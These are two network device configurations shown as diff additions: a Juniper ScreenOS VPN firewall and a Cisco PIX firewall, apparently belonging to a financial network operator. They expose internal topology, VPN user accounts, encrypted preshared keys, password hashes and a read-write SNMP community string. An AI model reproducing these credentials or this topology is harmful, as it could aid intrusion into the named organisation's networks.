+set interface bgroup0 port ethernet0/5
+unset interface vlan1 ip
+set interface ethernet0/0 ip 80.227.254.242/27
+set interface ethernet0/0 route
+set interface bgroup0 ip 192.168.196.5/24
+set interface bgroup0 nat
+set interface tunnel.4 ip 10.40.0.20/16
+set interface tunnel.7 ip 10.70.0.20/16
+set interface tunnel.4 mtu 1500
+set interface tunnel.7 mtu 1500
+unset interface vlan1 bypass-others-ipsec
+unset interface vlan1 bypass-non-ip
+set interface bgroup0 manage-ip 192.168.196.6
+set interface ethernet0/0 ip manageable
+unset interface bgroup0 ip manageable
+set interface ethernet0/0 manage ping
+set interface ethernet0/0 manage ssh
+set interface ethernet0/0 manage snmp
+set interface ethernet0/0 manage ssl
+set interface ethernet0/0 vip interface-ip 9090 "OpManager" 192.168.196.35 manual
+set interface ethernet0/0 vip interface-ip 8100 "IT360_8100_TCP" 192.168.196.35 manual
+set interface ethernet0/0 vip interface-ip 8400 "IT360_8400_TCP" 192.168.196.35 manual
+set interface ethernet0/0 vip interface-ip 9443 "IT360_9443_TCP" 192.168.196.35 manual
+set interface "ethernet0/0" mip 80.227.254.241 host 192.168.196.25 netmask 255.255.255.255 vr "trust-vr"
+set flow tcp-mss
+unset flow no-tcp-seq-check
+set flow tcp-syn-check
+unset flow tcp-syn-bit-check
+set flow reverse-route clear-text prefer
+set flow reverse-route tunnel always
+set hostname ENSBNVPN1
+set pki authority default scep mode "auto"
+set pki x509 default cert-path partial
+set nsrp cluster id 7
+set nsrp vsd-group id 0 priority 50
+set nsrp vsd-group id 0 preempt
+set nsrp interface bgroup0
+set nsrp monitor interface ethernet0/0
+set nsrp monitor interface bgroup0
+set dns host dns1 0.0.0.0
+set dns host dns2 0.0.0.0
+set dns host dns3 0.0.0.0
+set address "Trust" "ENSB-NOC-NW" 192.168.196.0 255.255.255.0 "NOC Network"
+set address "Trust" "ENSBNNSM1" 192.168.196.25 255.255.255.0 "NSM SERVER"
+set address "Trust" "NOC-SRV01" 192.168.196.35 255.255.255.255
+set address "Untrust" "CPMSP-NW" 192.168.150.0 255.255.255.0
+set address "Untrust" "EN SMTP" 80.227.254.251 255.255.255.255
+set address "Untrust" "ENSB-AE-NW" 192.168.206.0 255.255.254.0 "UAE DC Network"
+set address "Untrust" "ENSB-AE2-NW" 192.168.211.0 255.255.255.0 "AE DC2 Network"
+set address "Untrust" "ENSB-BH-HW" 192.168.236.0 255.255.255.0 "Bahrain DC Network"
+set address "Untrust" "ENSB-JO-NW" 192.168.216.0 255.255.255.0
+set address "Untrust" "ENSB-PK-NW" 192.168.246.0 255.255.255.0 "Pakistan DC Network"
+set address "Untrust" "ENSB-TR-NW" 192.168.216.0 255.255.254.0 "Turkey DC NW"
+set address "Untrust" "ENSB-US-DR-NW" 192.168.112.0 255.255.255.0 "US DC DR Network"
+set address "Untrust" "ENSB-US-PR-NW" 192.168.111.0 255.255.255.0 "US DC Primary Network"
+set address "Untrust" "QI-AE-NW" 192.168.160.0 255.255.255.0
+set address "Untrust" "QI-BH-NW" 192.168.60.0 255.255.255.0
+set group address "Untrust" "ENSB NW" comment "ALL ENSB NW"
+set group address "Untrust" "ENSB NW" add "ENSB-AE-NW"
+set group address "Untrust" "ENSB NW" add "ENSB-AE2-NW"
+set group address "Untrust" "ENSB NW" add "ENSB-BH-HW"
+set group address "Untrust" "ENSB NW" add "ENSB-PK-NW"
+set group address "Untrust" "ENSB NW" add "ENSB-TR-NW"
+set group address "Untrust" "ENSB NW" add "ENSB-US-PR-NW"
+set group service "IT360"
+set group service "IT360" add "IT360_8100_TCP"
+set group service "IT360" add "IT360_8400_TCP"
+set group service "IT360" add "IT360_8443_TCP"
+set group service "IT360" add "IT360_9996_UDP"
+set group service "NSM_IN" comment "NSM Incoming ports"
+set group service "NSM_IN" add "NSM_7804"
+set group service "NSM_IN" add "NSM_GUI_Client_7808_TCP"
+set group service "NSM_IN" add "NSM_GUI_Client_TCP"
+set group service "NSM_IN" add "NSM_HA_TCP"
+set group service "NSM_IN" add "NSM_Managed_Client_TCP"
+set group service "NSM_IN" add "NSM_Managed_IDP_TCP"
+set group service "NSM_IN" add "NSM_SSLVPN_TCP"
+set group service "NSM_IN" add "SSH"
+set group service "NSM_IN" add "TELNET"
+set group service "NSM_OUT" comment "NSM OUtbound ports"
+set group service "NSM_OUT" add "DNS"
+set group service "NSM_OUT" add "FTP"
+set group service "NSM_OUT" add "HTTP"
+set group service "NSM_OUT" add "HTTPS"
+set group service "NSM_OUT" add "NSM_7804"
+set group service "NSM_OUT" add "NSM_SSLVPN_TCP"
+set group service "NSM_OUT" add "NTP"
+set group service "NSM_OUT" add "SSH"
+set group service "NSM_OUT" add "TELNET"
+set ippool "ENSB-NOC-NW" 10.149.121.1 10.149.121.254
+set ippool "ENSB-NOC-FA" 10.149.122.1 10.149.122.20
+set ippool "ENSB-NOC-IS" 10.149.123.1 10.149.123.20
+set ippool "ENSB-NOC-PG" 10.149.124.1 10.149.124.20
+set ippool "ENSB-NOC-FINMEX" 10.149.125.1 10.149.125.20
+set ippool "ENSB-NOC-UNIRISX" 10.149.126.1 10.149.126.20
+set ippool "ENSB-NOC-PK" 10.149.127.1 10.149.127.20
+set ippool "ENSB-NOC-JO" 10.149.129.1 10.149.129.20
+set ippool "ENSB-NOC-US" 10.149.128.1 10.149.128.20
+set user "adesear" uid 1
+set user "adesear" ike-id u-fqdn "adesear@eastnets.com" share-limit 1
+set user "adesear" type ike xauth
+set user "adesear" remote ippool "ENSB-NOC-NW"
+set user "adesear" password "0TjLvUu6NJOBFMscuOCnptfiZunhWoleCw=="
+unset user "adesear" type auth
+set user "adesear" "enable"
+set user "juy" uid 2
+set user "juy" ike-id u-fqdn "juy@eastnets.com" share-limit 1
+set user "juy" type ike xauth
+set user "juy" remote ippool "ENSB-NOC-NW"
+set user "juy" password "dT36Q1nRN3lwBVsZl7ChVzTZeKn4gG9ILQ=="
+unset user "juy" type auth
+set user "juy" "enable"
+set user "kbaluyot" uid 3
+set user "kbaluyot" ike-id u-fqdn "kbaluyot@eastnets.com" share-limit 1
+set user "kbaluyot" type ike xauth
+set user "kbaluyot" remote ippool "ENSB-NOC-NW"
+set user "kbaluyot" password "9b9kpb/wNk+WRis5FpCBSHbKiKnb9KBWbA=="
+unset user "kbaluyot" type auth
+set user "kbaluyot" "enable"
+set user "msaeed" uid 4
+set user "msaeed" ike-id u-fqdn "msaeed@eastnets.com" share-limit 1
+set user "msaeed" type ike xauth
+set user "msaeed" remote ippool "ENSB-NOC-NW"
+set user "msaeed" password "fqtlGLWGNmiGA5s6JNChAlywkEnncJxQqw=="
+unset user "msaeed" type auth
+set user "msaeed" "enable"
+set user-group "NW Group" id 1
+set user-group "NW Group" user "adesear"
+set user-group "NW Group" user "juy"
+set user-group "NW Group" user "kbaluyot"
+set user-group "NW Group" user "msaeed"
+set crypto-policy
+exit
+set ike gateway "DC-AE-SWIFT" address 80.227.254.201 Main outgoing-interface "ethernet0/0" preshare "vfrvuNKbNcnK5fsgHdCgOu/+/UnyByPUGsKh3QIx9bY5aKxXi8SSRj0=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-AE-SWIFT" nat-traversal
+set ike gateway "DC-AE-SWIFT" nat-traversal udp-checksum
+set ike gateway "DC-AE-SWIFT" nat-traversal keepalive-frequency 0
+set ike gateway "DC-TR-LL" address 193.23.156.220 Main outgoing-interface "ethernet0/0" preshare "4315J1cuNwFhTSsmHzCDr1jPlInuTQyMLXzBBCtoVKzcPGxgaStKIWo=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-BH-LL" address 81.22.17.35 Main outgoing-interface "ethernet0/0" preshare "i5zERIcXNU+UCFsHJjCbqjRxQ0nDm5gMmT56nOLRfW+B4an+3f3OTBo=" proposal "pre-g2-3des-sha"
+set ike gateway "ENSB NW Dialup Group" dialup "NW Group" Aggr outgoing-interface "ethernet0/0" preshare "Jes1xtBgNkX60MsJH3C5nRUVWXn2x4b+xHsehqVUTTOK6+hqZY7ZSgo=" proposal "pre-g2-3des-sha"
+set ike gateway "ENSB NW Dialup Group" nat-traversal udp-checksum
+set ike gateway "ENSB NW Dialup Group" nat-traversal keepalive-frequency 0
+set ike gateway "ENSB NW Dialup Group" xauth
+unset ike gateway "ENSB NW Dialup Group" xauth do-edipi-auth
+set ike gateway "DC-JO-LL" address 77.245.10.172 Main outgoing-interface "ethernet0/0" preshare "3XTJ38KPNkf7YEsKTECeXuQndSngJbege91bsmpEFsJ66MoY+h/B9+I=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-CPMS-EHDF-LL" address 80.227.254.228 Main outgoing-interface "ethernet0/0" preshare "ua9iMfeVNPDvvps6/UC7x5WGLFn2UfaApemIcX9NK3X1OYdfZ951I3Q=" proposal "pre-g2-3des-sha"
+set ike gateway "QI-AE-LL" address 80.227.254.219 Main outgoing-interface "ethernet0/0" preshare "Nv5infAQNdMPBoscgLC/UiQIAOnbrqYWfL9Oi9nJ2gGhM2NGfQdWOCQ=" proposal "pre-g2-3des-sha"
+set ike gateway "QI-BH-LL" address 81.22.17.38 Main outgoing-interface "ethernet0/0" preshare "0mH2B2wON9Vgpws+hHCmLdeeZvnWqJEL0RevcxgMoLz7b948MRA8Tig=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-US-LL-PR" address 209.123.80.7 Main outgoing-interface "ethernet0/0" preshare "lMnqKp8WNS3yhMsk5WCK4a3xkjnuL/uzSCNas+LowZPsDzrl3o81Cwk=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-US-LL-PR" nat-traversal
+set ike gateway "DC-US-LL-PR" nat-traversal udp-checksum
+set ike gateway "DC-US-LL-PR" nat-traversal keepalive-frequency 5
+set ike gateway "DC-US-LL-DR" address 69.167.70.242 Main outgoing-interface "ethernet0/0" preshare "YqGIDy8pNXfKQ8sBVvC/7ed/BDnFt6wh/lUjGGu9hnHnse3nmp87DyY=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-US-LL-DR" nat-traversal
+set ike gateway "DC-US-LL-DR" nat-traversal udp-checksum
+set ike gateway "DC-US-LL-DR" nat-traversal keepalive-frequency 5
+set ike gateway "DC-PK-LL" address 202.63.216.20 Main outgoing-interface "ethernet0/0" preshare "xSmBxsRmN0khN8sXPQCrkG9AkUnfX03Bs3JmXSN0grNpN/YO9YsU8Jc=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-CPMS-ETISALAT" address 213.42.22.136 Main outgoing-interface "ethernet0/0" preshare "gv2S3jdqNjwhp2sUf1CLNPKqwpndYkbbisyL5dX8TcAMUgHhekq6zjI=" proposal "pre-g2-3des-sha"
+set ike gateway "DC-AE-HOST" address 80.227.254.205 Main outgoing-interface "ethernet0/0" preshare "DyiejXENNvmC7Ps7bJCy9TBzKZn3x9f+b2dMA7uam+YkPNVOsTjRfJM=" proposal "pre-g2-3des-sha"
+set ike respond-bad-spi 1
+set ike ikev2 ike-sa-soft-lifetime 60
+unset ike ikeid-enumeration
+unset ike dos-protection
+unset ipsec access-session enable
+set ipsec access-session maximum 5000
+set ipsec access-session upper-threshold 0
+set ipsec access-session lower-threshold 0
+set ipsec access-session dead-p2-sa-timeout 0
+unset ipsec access-session log-error
+unset ipsec access-session info-exch-connected
+unset ipsec access-session use-error-log
+set vpn "DC-AE-SWIFT" gateway "DC-AE-SWIFT" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-AE-SWIFT" monitor optimized rekey
+set vpn "DC-AE-SWIFT" id 0xb bind interface tunnel.4
+set vpn "DC-AE-SWIFT" dscp-mark 0
+set vpn "DC-TR-LL" gateway "DC-TR-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-TR-LL" monitor optimized rekey
+set vpn "DC-TR-LL" id 0xa bind interface tunnel.4
+set vpn "DC-BH-LL" gateway "DC-BH-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-BH-LL" monitor optimized rekey
+set vpn "DC-BH-LL" id 0x9 bind interface tunnel.4
+set vpn "ENSB NW Dialup Group" gateway "ENSB NW Dialup Group" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-JO-LL" gateway "DC-JO-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-JO-LL" monitor optimized rekey
+set vpn "DC-JO-LL" id 0xc bind interface tunnel.4
+set vpn "DC-CPMS-PRI-LL" gateway "DC-CPMS-EHDF-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-CPMS-PRI-LL" monitor optimized rekey
+set vpn "DC-CPMS-PRI-LL" id 0xd bind interface tunnel.4
+set vpn "DC-CPMS-PRI-LL" dscp-mark 0
+set vpn "QI-AE-LL" gateway "QI-AE-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "QI-AE-LL" monitor optimized rekey
+set vpn "QI-AE-LL" id 0x18 bind interface tunnel.4
+set vpn "QI-BH-LL" gateway "QI-BH-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "QI-BH-LL" monitor optimized rekey
+set vpn "QI-BH-LL" id 0x10 bind interface tunnel.4
+set vpn "DC-US-LL-PR" gateway "DC-US-LL-PR" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-US-LL-PR" monitor optimized rekey
+set vpn "DC-US-LL-PR" id 0x12 bind interface tunnel.7
+set vpn "DC-US-LL-DR" gateway "DC-US-LL-DR" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-US-LL-DR" monitor optimized rekey
+set vpn "DC-US-LL-DR" id 0x13 bind interface tunnel.7
+set vpn "DC-PK-LL" gateway "DC-PK-LL" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-PK-LL" monitor optimized rekey
+set vpn "DC-PK-LL" id 0x14 bind interface tunnel.4
+set vpn "DC-CPMS-ETISALAT-LL" gateway "DC-CPMS-ETISALAT" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-CPMS-ETISALAT-LL" monitor optimized rekey
+set vpn "DC-CPMS-ETISALAT-LL" id 0x15 bind interface tunnel.4
+set vpn "DC-AE-HOST" gateway "DC-AE-HOST" replay tunnel idletime 0 proposal "g2-esp-3des-sha" 
+set vpn "DC-AE-HOST" monitor optimized rekey
+set vpn "DC-AE-HOST" id 0x17 bind interface tunnel.7
+set vrouter "untrust-vr"
+set protocol nhrp
+set protocol nhrp retry-interval 30
+set protocol nhrp max-query 12
+exit
+set vrouter "trust-vr"
+set protocol nhrp
+set protocol nhrp retry-interval 30
+set protocol nhrp max-query 12
+exit
+set url protocol websense
+exit
+set policy id 21 name "Monitoring System" from "Untrust" to "Trust"  "Any" "VIP(ethernet0/0)" "IT360_8100_TCP" permit log 
+set policy id 21
+set service "IT360_8400_TCP"
+set service "IT360_9443_TCP"
+set service "IT360_9996_UDP"
+set service "OpManagerVIP"
+set log session-init
+exit
+set policy id 16 from "Trust" to "Untrust"  "NOC-SRV01" "EN SMTP" "SMTP" permit log 
+set policy id 16
+set log session-init
+exit
+set policy id 12 from "Trust" to "Untrust"  "ENSB-NOC-NW" "QI-AE-NW" "ANY" permit log 
+set policy id 12
+set log session-init
+exit
+set policy id 14 from "Trust" to "Untrust"  "ENSB-NOC-NW" "QI-BH-NW" "ANY" permit log 
+set policy id 14
+set log session-init
+exit
+set policy id 4 from "Untrust" to "Trust"  "Any" "MIP(80.227.254.241)" "HTTPS" permit log 
+set policy id 4
+set service "ICMP-ANY"
+set service "TELNET"
+set service "NSM_IN"
+set log session-init
+exit
+set policy id 2 from "Untrust" to "Trust"  "ENSB-AE-NW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 2
+exit
+set policy id 8 from "Untrust" to "Trust"  "ENSB-BH-HW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 8
+exit
+set policy id 9 from "Untrust" to "Trust"  "ENSB-JO-NW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 9
+exit
+set policy id 3 from "Trust" to "Untrust"  "ENSBNNSM1" "Any" "ICMP-ANY" permit log 
+set policy id 3
+set service "NSM_OUT"
+exit
+set policy id 1 from "Trust" to "Untrust"  "ENSB-NOC-NW" "ENSB NW" "ANY" permit log 
+set policy id 1
+exit
+set policy id 6 from "Untrust" to "Trust"  "Dial-Up VPN" "ENSB-NOC-NW" "ANY" tunnel vpn "ENSB NW Dialup Group" id 0xe pair-policy 7 log 
+set policy id 6
+exit
+set policy id 7 from "Trust" to "Untrust"  "ENSB-NOC-NW" "Dial-Up VPN" "ANY" tunnel vpn "ENSB NW Dialup Group" id 0xe pair-policy 6 log 
+set policy id 7
+exit
+set policy id 10 from "Trust" to "Untrust"  "ENSB-NOC-NW" "CPMSP-NW" "ANY" permit log 
+set policy id 10
+exit
+set policy id 11 from "Untrust" to "Trust"  "CPMSP-NW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 11
+exit
+set policy id 13 from "Untrust" to "Trust"  "QI-AE-NW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 13
+set log session-init
+exit
+set policy id 15 from "Untrust" to "Trust"  "QI-BH-NW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 15
+set log session-init
+exit
+set policy id 17 from "Trust" to "Untrust"  "ENSB-NOC-NW" "ENSB-US-PR-NW" "ANY" permit log 
+set policy id 17
+set log session-init
+exit
+set policy id 18 from "Trust" to "Untrust"  "ENSB-NOC-NW" "ENSB-US-DR-NW" "ANY" permit log 
+set policy id 18
+set log session-init
+exit
+set policy id 19 from "Untrust" to "Trust"  "ENSB-US-PR-NW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 19
+set log session-init
+exit
+set policy id 20 from "Untrust" to "Trust"  "ENSB-US-DR-NW" "ENSB-NOC-NW" "ANY" permit log 
+set policy id 20
+set log session-init
+exit
+set syslog config "192.168.206.111"
+set syslog config "192.168.206.111" facilities local0 local0
+set syslog config "192.168.206.111" port 1514
+set syslog config "192.168.206.111" log traffic
+set syslog enable
+set nsmgmt report proto-dist enable
+set nsmgmt report statistics ethernet enable
+set nsmgmt report statistics attack enable
+set nsmgmt report statistics flow enable
+set nsmgmt report statistics policy enable
+set nsmgmt report alarm traffic enable
+set nsmgmt report alarm attack enable
+set nsmgmt report alarm other enable
+set nsmgmt report alarm di enable
+set nsmgmt report log config enable
+set nsmgmt report log info enable
+set nsmgmt report log self enable
+set nsmgmt report log traffic enable
+set nsmgmt init id C2DD45C0C360D0EBB64B767EDB4516983964644200
+set nsmgmt server primary 192.168.196.25 port 7800
+set nsmgmt bulkcli reboot-timeout 60
+set nsmgmt hb-interval 20
+set nsmgmt hb-threshold 5
+set nsmgmt enable
+set ssh version v2
+set ssh enable
+set config lock timeout 5
+unset license-key auto-update
+set ssl port 2443
+set snmp community "EastNets-SNMP" Read-Write Trap-on traffic version v2c  
+set snmp host "EastNets-SNMP" 192.168.206.111 255.255.255.255 trap v2
+set snmp port listen 161
+set snmp port trap 162
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset add-default-route
+set route 192.168.150.0/24 interface tunnel.4 gateway 10.40.0.25 description "CPMS-PRI-LL"
+set route 192.168.160.0/24 interface tunnel.4 gateway 10.40.0.35 metric 10 description "QI-AE-LL"
+set route 192.168.60.0/24 interface tunnel.4 gateway 10.40.0.40 metric 10 description "QI-BH-LL"
+set route 192.168.206.0/23 interface tunnel.4 gateway 10.40.0.1 description "ENSB-AE"
+set route 0.0.0.0/0 interface ethernet0/0 gateway 80.227.254.225 description "Defualt Route"
+set route 192.168.236.0/24 interface tunnel.4 gateway 10.40.0.10 permanent description "ENSB BH"
+set route 192.168.111.0/24 interface tunnel.7 gateway 10.70.0.65 description "DC-US-LL-PR"
+set route 192.168.112.0/24 interface tunnel.7 gateway 10.70.0.70 description "DC-US-LL-DR"
+set route 192.168.216.0/23 interface tunnel.4 gateway 10.40.0.15 description "ENSB JO"
+set route 192.168.246.0/24 interface tunnel.4 gateway 10.40.0.50 description "DC PK"
+set route 192.168.50.0/24 interface tunnel.4 gateway 10.40.0.30 description "CPMS ETISALAT VPN3 "
+set route 192.168.211.0/24 interface tunnel.7 gateway 10.70.0.55 description "DC AE HOST"
+exit
+set interface tunnel.4 protocol ospf area 0.0.0.0
+set interface tunnel.4 protocol ospf demand-circuit
+set interface tunnel.4 protocol ospf link-type p2mp
+set interface tunnel.4 protocol ospf enable
+set interface tunnel.4 protocol ospf cost 10
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+exit

swift/00553_0_ensbdpix3-09aug2013

@@ -0,0 +1,373 @@
+: Saved
+: Written by enable_15 at 22:49:58.534 UTC Sun Aug 11 2013
+PIX Version 6.3(5)
+interface ethernet0 100full
+interface ethernet1 100full
+interface ethernet2 100full
+interface ethernet3 100full
+interface ethernet4 100full
+interface ethernet5 100full
+nameif ethernet0 clients security10
+nameif ethernet1 paygate security80
+nameif ethernet2 host security90
+nameif ethernet3 dmz security70
+nameif ethernet4 smartstream security20
+nameif ethernet5 mgmt security95
+enable password Ro5XpDeSuehPBEdi encrypted
+passwd Ro5XpDeSuehPBEdi encrypted
+hostname ENSBDPIX3
+domain-name ciscopix.com
+fixup protocol dns maximum-length 512
+fixup protocol ftp 21
+fixup protocol h323 h225 1720
+fixup protocol h323 ras 1718-1719
+fixup protocol http 80
+fixup protocol rsh 514
+fixup protocol rtsp 554
+fixup protocol sip 5060
+fixup protocol sip udp 5060
+fixup protocol skinny 2000
+fixup protocol smtp 25
+fixup protocol sqlnet 1521
+fixup protocol tftp 69
+names
+name 192.168.201.207 pg-qtel
+name 192.168.201.205 pg-dgcx
+name 192.168.201.201 pg-arcapita
+name 192.168.218.209 endssdb1
+name 192.168.218.208 endssapp1
+name 10.155.0.0 ss-client-nw
+name 192.168.200.166 ensbdnbcr2
+name 192.168.200.165 ensbdnbcr1
+name 10.149.7.0 pg-sslvpn-nw
+name 10.149.3.0 fmhs-sslvpn-nw
+name 10.149.11.0 nw-sslvpn-nw
+name 10.149.13.0 ins-sslvpn-nw
+name 192.168.200.104 sl3
+name 192.168.200.245 ftp
+name 192.168.203.215 ensbdtasw1
+name 10.153.4.64 qfqf-gnat-nw
+name 192.168.208.10 ensbdmgmt1
+name 192.168.208.11 ensbdmgmt2
+name 192.168.200.246 ftp2
+object-group network smartstream-srv-group 
+  network-object endssapp1 255.255.255.255 
+  network-object endssdb1 255.255.255.255 
+object-group service ss-services tcp 
+  port-object eq 10000 
+  port-object eq ftp 
+  port-object eq 30003 
+access-list dmz_access_in permit ip any any 
+access-list dmz_access_in permit icmp any any 
+access-list dmz_access_in remark To be removed after the activiation
+access-list dmz_access_in permit ip host ensbdtasw1 any 
+access-list dmz_access_in remark To be removed after the activiation
+access-list dmz_access_in permit icmp host ensbdtasw1 any 
+access-list paygate_access_in permit ip any any 
+access-list paygate_access_in permit icmp any any 
+access-list clients_access_in permit tcp nw-sslvpn-nw 255.255.255.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit tcp ins-sslvpn-nw 255.255.255.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit tcp ss-client-nw 255.255.0.0 host 192.168.206.208 object-group ss-services 
+access-list clients_access_in permit icmp any any 
+access-list clients_access_in permit tcp any any eq www 
+access-list clients_access_in permit tcp any any eq https 
+access-list clients_access_in remark 
+access-list clients_access_in permit tcp 10.71.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in remark 
+access-list clients_access_in permit tcp 10.72.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in permit tcp 10.149.0.0 255.255.0.0 any eq 3389 
+access-list clients_access_in remark ACCESS FROM OLD CAGE - KXB 21JULY2010
+access-list clients_access_in permit ip 192.168.106.0 255.255.254.0 any 
+access-list clients_access_in permit tcp qfqf-gnat-nw 255.255.255.192 host 192.168.206.230 eq www 
+access-list host_access_in permit icmp any any 
+access-list host_access_in permit ip any any 
+access-list smartstream_access_in permit ip any any 
+access-list smartstream_access_in permit icmp any any 
+access-list mgmt_access_in permit ip any any 
+access-list mgmt_access_in permit icmp any any 
+pager lines 20
+logging history informational
+mtu clients 1500
+mtu paygate 1500
+mtu host 1500
+mtu dmz 1500
+mtu smartstream 1500
+mtu mgmt 1500
+ip address clients 192.168.206.3 255.255.255.0
+ip address paygate 192.168.201.3 255.255.255.0
+ip address host 192.168.200.3 255.255.255.0
+ip address dmz 192.168.203.3 255.255.255.0
+ip address smartstream 192.168.218.3 255.255.255.0
+ip address mgmt 192.168.208.3 255.255.255.0
+ip audit info action alarm
+ip audit attack action alarm
+failover
+failover timeout 0:00:00
+failover poll 15
+failover ip address clients 192.168.206.252
+failover ip address paygate 192.168.201.252
+failover ip address host 192.168.200.252
+failover ip address dmz 192.168.203.252
+failover ip address smartstream 192.168.218.252
+failover ip address mgmt 192.168.208.252
+pdm location 0.0.0.0 0.0.0.0 host
+pdm location 192.168.200.33 255.255.255.255 host
+pdm location 192.168.200.34 255.255.255.255 host
+pdm location 192.168.200.59 255.255.255.255 host
+pdm location 192.168.200.62 255.255.255.255 host
+pdm location pg-arcapita 255.255.255.255 paygate
+pdm location 192.168.201.203 255.255.255.255 paygate
+pdm location pg-dgcx 255.255.255.255 paygate
+pdm location 192.168.200.35 255.255.255.255 paygate
+pdm location 192.168.200.201 255.255.255.255 host
+pdm location 192.168.201.35 255.255.255.255 paygate
+pdm location 192.168.200.203 255.255.255.255 host
+pdm location 192.168.200.205 255.255.255.255 host
+pdm location 192.168.203.201 255.255.255.255 dmz
+pdm location 192.168.206.201 255.255.255.255 clients
+pdm location 192.168.206.203 255.255.255.255 clients
+pdm location 192.168.206.205 255.255.255.255 clients
+pdm location 192.168.201.110 255.255.255.255 paygate
+pdm location 192.168.202.249 255.255.255.255 host
+pdm location 192.168.202.249 255.255.255.255 paygate
+pdm location 192.168.202.249 255.255.255.255 dmz
+pdm location 192.168.202.249 255.255.255.255 clients
+pdm location 192.168.206.220 255.255.255.255 clients
+pdm location 192.168.206.225 255.255.255.255 clients
+pdm location 192.168.203.220 255.255.255.255 dmz
+pdm location 192.168.203.225 255.255.255.255 dmz
+pdm location 192.168.200.51 255.255.255.255 host
+pdm location 192.168.200.71 255.255.255.255 host
+pdm location pg-qtel 255.255.255.255 paygate
+pdm location 192.168.200.207 255.255.255.255 host
+pdm location 192.168.206.207 255.255.255.255 clients
+pdm location 192.168.200.25 255.255.255.255 host
+pdm location 192.168.200.20 255.255.255.255 host
+pdm location 10.72.110.0 255.255.255.0 clients
+pdm location 192.168.203.230 255.255.255.255 dmz
+pdm location 192.168.200.22 255.255.255.255 host
+pdm location 0.0.0.0 255.0.0.0 clients
+pdm location 10.71.120.0 255.255.255.0 clients
+pdm location 192.168.203.0 255.255.255.0 dmz
+pdm location 192.168.200.72 255.255.255.255 host
+pdm location 192.168.203.235 255.255.255.255 dmz
+pdm location 192.168.200.52 255.255.255.255 host
+pdm location 192.168.200.95 255.255.255.255 host
+pdm location 192.168.200.96 255.255.255.255 host
+pdm location 192.168.206.235 255.255.255.255 clients
+pdm location 192.168.201.111 255.255.255.255 paygate
+pdm location 192.168.201.112 255.255.255.255 paygate
+pdm location 192.168.200.35 255.255.255.255 host
+pdm location 192.168.200.10 255.255.255.255 host
+pdm location 192.168.200.11 255.255.255.255 host
+pdm location 192.168.200.11 255.255.255.255 dmz
+pdm location 192.168.203.110 255.255.255.255 dmz
+pdm location 192.168.203.111 255.255.255.255 dmz
+pdm location nw-sslvpn-nw 255.255.255.0 clients
+pdm location 10.154.0.0 255.255.0.0 clients
+pdm location pg-sslvpn-nw 255.255.255.0 clients
+pdm location 10.153.2.0 255.255.255.192 clients
+pdm location endssdb1 255.255.255.255 smartstream
+pdm location endssapp1 255.255.255.255 smartstream
+pdm location ins-sslvpn-nw 255.255.255.0 clients
+pdm location 10.149.0.0 255.255.0.0 clients
+pdm location ss-client-nw 255.255.0.0 clients
+pdm location 10.71.0.0 255.255.0.0 clients
+pdm location 10.72.0.0 255.255.0.0 clients
+pdm location 10.153.0.64 255.255.255.192 clients
+pdm location ensbdnbcr1 255.255.255.255 host
+pdm location ensbdnbcr2 255.255.255.255 host
+pdm location fmhs-sslvpn-nw 255.255.255.0 clients
+pdm location sl3 255.255.255.255 host
+pdm location 192.168.219.0 255.255.255.0 host
+pdm location 10.154.9.128 255.255.255.192 clients
+pdm location ftp 255.255.255.255 host
+pdm location 192.168.211.0 255.255.255.0 clients
+pdm location 172.28.0.0 255.255.0.0 host
+pdm location 192.168.200.208 255.255.255.255 host
+pdm location 192.168.209.0 255.255.255.0 host
+pdm location 192.168.200.32 255.255.255.255 host
+pdm location 192.168.200.4 255.255.255.255 host
+pdm location 192.168.200.100 255.255.255.255 host
+pdm location 192.168.211.0 255.255.255.0 host
+pdm location 192.168.200.15 255.255.255.255 host
+pdm location 192.168.211.15 255.255.255.255 host
+pdm location 192.168.200.17 255.255.255.255 host
+pdm location 192.168.202.249 255.255.255.255 mgmt
+pdm location 192.168.106.0 255.255.254.0 clients
+pdm location ensbdtasw1 255.255.255.255 dmz
+pdm location 10.149.105.201 255.255.255.255 clients
+pdm location 10.149.105.202 255.255.255.255 clients
+pdm location 10.149.105.203 255.255.255.255 clients
+pdm location 192.168.203.113 255.255.255.255 dmz
+pdm location 192.168.203.114 255.255.255.255 dmz
+pdm location 10.15.0.0 255.255.255.0 clients
+pdm location 10.14.0.0 255.255.255.0 clients
+pdm location 10.31.5.130 255.255.255.255 clients
+pdm location 10.33.10.202 255.255.255.255 clients
+pdm location 10.33.14.0 255.255.255.0 clients
+pdm location 10.40.5.32 255.255.255.255 clients
+pdm location 10.40.5.63 255.255.255.255 clients
